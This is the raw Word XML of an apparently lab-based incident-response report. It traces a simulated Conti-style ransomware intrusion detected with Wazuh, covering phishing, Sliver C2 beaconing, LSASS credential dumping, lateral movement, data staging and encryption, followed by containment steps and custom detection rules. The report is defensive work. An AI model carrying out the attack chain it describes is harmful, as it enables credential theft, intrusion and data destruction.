        <w:t>Phase 2 — Persistence  (T1053.005)</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Windows Event ID 4698 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>captured on WS-EMP01: scheduled task 'WindowsUpdateHelper' created by EMP01\Administrator.</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Task action path: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>C:\Users\Public\invoice_Q3.exe — executed at every user logon under the calling user's security context.</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Custom Rule 100030 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>(Wazuh level 12) triggered, elevating this from an informational event to a tracked investigation item.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:before="0" w:after="120"/>
        <w:jc w:val="start"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:before="160" w:after="60"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="4A7FA5"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Phase 3 — C2 Beaconing  (T1071.001)</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Sysmon EID 3 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>repeated outbound connections from powershell.exe / cscript.exe to 10.10.10.40 port 4444.</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Beacon cadence: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>30-second interval — Sliver HTTP default jitter profile. No legitimate process in the pre-attack baseline contacted this IP.</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Wazuh EID 3 cluster </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>visible in Discover view: 49 Sysmon EventID:1 hits for agent EMP01 in the 24-hour window, concentrated in a burst consistent with C2 initiation.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:before="0" w:after="120"/>
        <w:jc w:val="start"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:before="160" w:after="60"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="4A7FA5"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Phase 4 — Credential Dumping  (T1003.001)</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Sysmon EID 10 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>(ProcessAccess): SourceImage = powershell.exe; TargetImage = lsass.exe; GrantedAccess = 0x1010 (PROCESS_VM_READ + PROCESS_QUERY_INFORMATION).</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Custom Rule 100010 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>(designed by the analyst) fired at Level 15 CRITICAL — the only mechanism to elevate this to immediate-response severity, as default Wazuh rules do not flag LSASS access at critical level.</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ParentCommandLine: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (session PID 5780, parent 9360 — Sliver implant ancestry confirmed).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:before="0" w:after="120"/>
        <w:jc w:val="start"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:before="0" w:after="120"/>
        <w:jc w:val="start"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:before="0" w:after="120"/>
        <w:jc w:val="start"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:before="160" w:after="60"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="4A7FA5"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Phase 5 — Lateral Movement  (T1021.002)</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Windows EID 4624 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>on both FS01 and DC01: Logon Type 3 (Network), Source IP: 10.10.10.40, Authentication Package: NTLM — logged within 90 minutes of T0.</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Parent process on FS01: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>cscript.exe (image: C:\Windows\System32\cscript.exe) executing OSTap download script — confirming the lateral presence of attacker tooling.</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EID 10 on FS01 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>from search filter 'parentImage: winword.exe OR image: cscript.exe': 3 hits — demonstrating cross-host process ancestry tracing via Wazuh's centralized log store.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:before="0" w:after="120"/>
        <w:jc w:val="start"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:before="160" w:after="60"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="4A7FA5"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Phase 6 — Data Staging  (T1074.001)</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Wazuh FIM: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>50+ file access alerts within 60 seconds across all 4 SMB shares (Finance, Radiology, Appointments, ITSupport) on FS01.</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Archive creation: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>exfil.zip created in C:\Windows\Temp — FIM alert on new file creation in a system-level temp directory.</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Anomaly: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>No single authenticated user account in the baseline accessed all 4 department shares simultaneously — this pattern has no legitimate operational equivalent.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:before="0" w:after="120"/>
        <w:jc w:val="start"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:before="160" w:after="60"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="4A7FA5"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Phase 7 — Ransomware Deployment  (T1486)</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Wazuh FIM: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>30 files modified within 5 seconds; file extensions changed from .txt → .CONTI within C:\RansomSimLab.</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Custom Rule 100020 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>(frequency rule: 20 FIM events / 30 seconds) fired at Level 15 — analyst-engineered rule specifically designed to catch encryption burst patterns.</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Ransomware note: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>HOW_TO_DECRYPT.txt creation event captured by FIM with a new-file alert — consistent with Conti operational signature.</w:t>
      </w:r>
    </w:p>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2.3  Incident Classification</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="9"/>
        <w:tblW w:w="9360" w:type="dxa"/>
        <w:jc w:val="start"/>
        <w:tblInd w:w="0" w:type="dxa"/>
        <w:tblLayout w:type="fixed"/>
        <w:tblCellMar>
          <w:top w:w="100" w:type="dxa"/>
          <w:start w:w="120" w:type="dxa"/>
          <w:bottom w:w="100" w:type="dxa"/>
          <w:end w:w="120" w:type="dxa"/>
        </w:tblCellMar>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="2399"/>
        <w:gridCol w:w="6961"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr/>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2399"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Classification Attribute</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6961"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Assessment</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Incident Type</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="69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Targeted Ransomware / Advanced Persistent Threat (APT) — Multi-stage, multi-host, domain-wide compromise</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Severity</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="69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CRITICAL — Domain Administrator credentials exposed, ransomware detonated, shared data encrypted</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Scope</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="69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WS-EMP01 (initial victim / beachhead), FS01 (data staging / lateral target), DC01 (credential target / lateral target)</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Threat Actor (Simulated)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="69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Wizard Spider TTPs — Conti RaaS operators (ATTACK01: 10.10.10.40, Kali Linux 2026.1)</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Initial Entry Vector</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="69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User execution of phishing payload: Office macro → PowerShell → Sliver beacon (T1204.002)</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Data Exposure</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="69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All content across 4 SMB departmental shares: Finance, Radiology, Appointments, ITSupport</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Credential Exposure</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="69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Domain Administrator NTLM hash — full domain compromise; all systems within spider.local at risk</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C2 Infrastructure</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="69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Sliver HTTP beacon → ATTACK01:4444; secondary: cscript.exe OSTap download chain</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Dwell Time (Lab Sim)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="69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T+0 to T+150 minutes (compressed from HSE's 57 days for lab efficiency)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:before="0" w:after="160"/>
        <w:jc w:val="start"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:before="0" w:after="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
      </w:r>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="9"/>
        <w:tblW w:w="9360" w:type="dxa"/>
        <w:jc w:val="start"/>
        <w:tblInd w:w="0" w:type="dxa"/>
        <w:tblLayout w:type="fixed"/>
        <w:tblCellMar>
          <w:top w:w="120" w:type="dxa"/>
          <w:start w:w="160" w:type="dxa"/>
          <w:bottom w:w="120" w:type="dxa"/>
          <w:end w:w="160" w:type="dxa"/>
        </w:tblCellMar>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="1400"/>
        <w:gridCol w:w="7960"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr/>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1400" w:type="dxa"/>
            <w:tcBorders/>
            <w:shd w:color="auto" w:fill="1B3A5C" w:val="clear"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Normal"/>
              <w:pageBreakBefore/>
              <w:widowControl/>
              <w:bidi w:val="0"/>
              <w:spacing w:before="0" w:after="0"/>
              <w:jc w:val="start"/>
              <w:rPr>
                <w:kern w:val="0"/>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:themeColor="accent1" w:themeTint="fd" w:val="DCE6F2"/>
                <w:kern w:val="0"/>
                <w:sz w:val="20"/>
                <w14:textFill>
                  <w14:solidFill>
                    <w14:schemeClr w14:val="accent1">
                      <w14:lumMod w14:val="20000"/>
                      <w14:lumOff w14:val="80000"/>
                    </w14:schemeClr>
                  </w14:solidFill>
                </w14:textFill>
              </w:rPr>
              <w:t>PHASE 3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7960" w:type="dxa"/>
            <w:tcBorders/>
            <w:shd w:color="auto" w:fill="1F5C99" w:val="clear"/>
            <w:tcMar>
              <w:start w:w="200" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Heading2"/>
              <w:widowControl/>
              <w:bidi w:val="0"/>
              <w:spacing w:before="240" w:after="80"/>
              <w:jc w:val="start"/>
              <w:rPr>
                <w:kern w:val="0"/>
              </w:rPr>
            </w:pPr>
            <w:bookmarkStart w:id="6" w:name="_Toc19017"/>
            <w:r>
              <w:rPr>
                <w:color w:themeColor="light1" w:val="FFFFFF"/>
                <w:kern w:val="0"/>
              </w:rPr>
              <w:t>CONTAINMENT</w:t>
            </w:r>
            <w:bookmarkEnd w:id="6"/>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:before="0" w:after="120"/>
        <w:jc w:val="start"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="9"/>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D4AC0D"/>
              <w:start w:val="single" w:sz="12" w:space="0" w:color="D4AC0D"/>
              <w:bottom w:val="single" w:sz="6" w:space="0" w:color="D4AC0D"/>
              <w:end w:val="single" w:sz="6" w:space="0" w:color="D4AC0D"/>
            </w:tcBorders>
            <w:shd w:color="auto" w:fill="FEF9E7" w:val="clear"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Normal"/>
              <w:widowControl/>
              <w:spacing w:before="0" w:after="0"/>
              <w:jc w:val="start"/>
              <w:rPr>
                <w:kern w:val="0"/>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri" w:cs="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="D4AC0D"/>
                <w:kern w:val="0"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">Phase Goal: </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri" w:cs="Calibri"/>
                <w:color w:val="5D4037"/>
                <w:kern w:val="0"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>Prevent the attack from propagating further. Speed takes precedence over completeness at this stage — every minute of uncontained C2 communication risks additional credential theft, lateral movement, and data encryption.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:before="0" w:after="160"/>
        <w:jc w:val="start"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="4" w:space="2" w:color="D6E4F0"/>
        </w:pBdr>
        <w:spacing w:before="240" w:after="80"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F5C99"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>3.1  Short-Term Containment (&lt; 15 Minutes)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:before="0" w:after="120"/>
        <w:jc w:val="start"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Triggered upon confirmation of C2 beaconing in Wazuh (Sysmon EID 3 — periodic outbound to 10.10.10.40:4444). The following actions are executed immediately and in parallel:</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="9"/>
        <w:tblW w:w="9360" w:type="dxa"/>
        <w:jc w:val="start"/>
        <w:tblInd w:w="0" w:type="dxa"/>
        <w:tblLayout w:type="fixed"/>
        <w:tblCellMar>
          <w:top w:w="100" w:type="dxa"/>
          <w:start w:w="120" w:type="dxa"/>
          <w:bottom w:w="100" w:type="dxa"/>
          <w:end w:w="120" w:type="dxa"/>
        </w:tblCellMar>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="1799"/>
        <w:gridCol w:w="2400"/>
        <w:gridCol w:w="1561"/>
        <w:gridCol w:w="3600"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr/>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1799"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Action</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="240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Execution Method</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1561"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Target</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="360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Rationale</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr/>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="17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Isolate WS-EMP01</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="24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Disable VMware NIC adapter / Tailscale interface</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="15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WS-EMP01</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="36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Severs active C2 channel; prevents further lateral spread from initial beachhead</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr/>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="17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Disable compromised AD account</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="24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Active Directory Users &amp; Computers → Disable emp01</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="15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DC01 / AD</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="36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Invalidates session tokens; prevents attacker leveraging stolen identity for RDP/SMB</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr/>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="17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Block ATTACK01 at SIEM host</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="24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sudo iptables -A INPUT -s 10.10.10.40 -j DROP</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="15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WAZUH01 (Ubuntu)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="36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Prevents attacker from tampering with SIEM logs or disabling monitoring</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr/>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="17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Preserve volatile memory</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="24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Snapshot WS-EMP01 VM (live state) before any reboot</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="15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WS-EMP01</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="36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Captures live process list, open network connections, and in-memory artefacts for forensics</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr/>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="17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Open incident ticket</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="24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Document T0, detection method, initial indicators, scope</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="15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All</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="36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Establishes formal chain of custody; ensures response is traceable and auditable</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>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3.2  Long-Term Containment (Concurrent with Investigation)</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Reset Domain Administrator password </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>— invalidates all NTLM Pass-the-Hash sessions, even if attacker retains the hash.</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Disable WinRM on FS01 and DC01 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>(TCP 5985/5986) — removes Evil-WinRM lateral movement vector.</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Enforce SMB signing </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>on all domain members — prevents NTLM relay attacks on the network segment.</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Restrict anonymous share access </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>— tighten share ACLs to deny unauthenticated enumeration.</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Set Wazuh alert level 10+ email notifications </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>— ensures the analyst team is paged for any further high-severity alerts during the response window.</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Verify DC01 and FS01 telemetry continuity </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
